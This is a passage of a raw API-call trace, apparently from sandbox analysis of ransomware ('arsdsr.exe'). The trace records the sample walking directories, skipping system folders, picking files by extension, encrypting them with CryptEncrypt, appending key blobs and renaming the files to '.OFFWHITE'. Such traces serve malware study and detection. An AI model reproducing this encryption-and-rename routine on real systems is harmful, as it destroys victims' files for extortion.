lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.070] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.071] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.071] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0084.071] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.071] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.071] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0084.071] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.081] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.081] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0084.081] lstrcmpiW (lpString1="Proof.en", lpString2=".") returned 1 [0084.081] lstrcmpiW (lpString1="Proof.en", lpString2="..") returned 1 [0084.081] lstrcmpiW (lpString1="Proof.en", lpString2="...") returned 1 [0084.081] lstrcmpiW (lpString1="Proof.en", lpString2="windows") returned -1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="$recycle.bin") returned 1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="rsa") returned -1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="ntuser.dat") returned 1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="programdata") returned 1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="appdata") returned 1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="program files") returned 1 [0084.082] lstrcmpiW (lpString1="Proof.en", lpString2="program files (x86)") returned 1 [0084.082] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.082] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.en" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0084.082] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0084.082] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0084.082] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0084.082] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0084.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.083] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0084.083] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.083] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2=".") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="..") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="...") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="windows") returned -1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="$recycle.bin") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="rsa") returned -1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="ntuser.dat") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="programdata") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="appdata") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="program files") returned 1 [0084.083] lstrcmpiW (lpString1="Proof.cab", lpString2="program files (x86)") returned 1 [0084.083] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0084.083] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Proof.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0084.083] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.083] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.083] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0084.083] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.084] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.084] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.084] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2=".") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="..") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="...") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="windows") returned -1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="$recycle.bin") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="rsa") returned -1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="ntuser.dat") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="programdata") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="appdata") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="program files") returned 1 [0084.084] lstrcmpiW (lpString1="Proof.msi", lpString2="program files (x86)") returned 1 [0084.084] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0084.084] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Proof.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0084.084] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.084] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.084] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0084.084] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.084] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.084] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.085] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.085] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0084.085] lstrcmpiW (lpString1="Proof.xml", lpString2=".") returned 1 [0084.085] lstrcmpiW (lpString1="Proof.xml", lpString2="..") returned 1 [0084.085] lstrcmpiW (lpString1="Proof.xml", lpString2="...") returned 1 [0084.085] lstrcmpiW (lpString1="Proof.xml", lpString2="windows") returned -1 [0084.085] lstrcmpiW (lpString1="Proof.xml", lpString2="$recycle.bin") returned 1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="rsa") returned -1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="ntuser.dat") returned 1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="programdata") returned 1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="appdata") returned 1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="program files") returned 1 [0084.086] lstrcmpiW (lpString1="Proof.xml", lpString2="program files (x86)") returned 1 [0084.086] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\" [0084.086] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\", lpString2="Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" [0084.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.086] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.086] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.087] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.087] lstrcmpiW (lpString1="Proof.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.087] GetProcessHeap () returned 0x500000 [0084.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bae0 [0084.087] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0084.091] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=1347) returned 1 [0084.091] GetProcessHeap () returned 0x500000 [0084.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.091] GetProcessHeap () returned 0x500000 [0084.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.091] GetProcessHeap () returned 0x500000 [0084.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.091] GetProcessHeap () returned 0x500000 [0084.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.091] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.091] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.091] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.091] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.091] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.091] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.091] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.091] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.091] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0084.092] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.092] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.092] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0084.092] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x543, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.092] SetLastError (dwErrCode=0x0) [0084.092] WriteFile (in: hFile=0x214, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.098] GetLastError () returned 0x0 [0084.098] GetLastError () returned 0x0 [0084.098] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x643, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.098] WriteFile (in: hFile=0x214, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.098] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x743, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.098] WriteFile (in: hFile=0x214, lpBuffer=0x52bae0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52bae0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0084.099] GetProcessHeap () returned 0x500000 [0084.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x543) returned 0x52e7e8 [0084.099] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.099] ReadFile (in: hFile=0x214, lpBuffer=0x52e7e8, nNumberOfBytesToRead=0x543, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesRead=0x295dec0*=0x543, lpOverlapped=0x0) returned 1 [0084.099] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.099] WriteFile (in: hFile=0x214, lpBuffer=0x52e7e8*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesWritten=0x295decc*=0x543, lpOverlapped=0x0) returned 1 [0084.099] GetProcessHeap () returned 0x500000 [0084.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52e7e8 | out: hHeap=0x500000) returned 1 [0084.099] CloseHandle (hObject=0x214) returned 1 [0084.100] GetProcessHeap () returned 0x500000 [0084.100] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.100] GetProcessHeap () returned 0x500000 [0084.100] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.100] GetProcessHeap () returned 0x500000 [0084.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.101] GetProcessHeap () returned 0x500000 [0084.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.101] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" [0084.101] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.OFFWHITE" [0084.101] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.offwhite")) returned 1 [0084.101] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0084.101] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0084.102] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2=".") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="..") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="...") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="windows") returned -1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="$recycle.bin") returned 1 [0084.102] lstrcmpiW 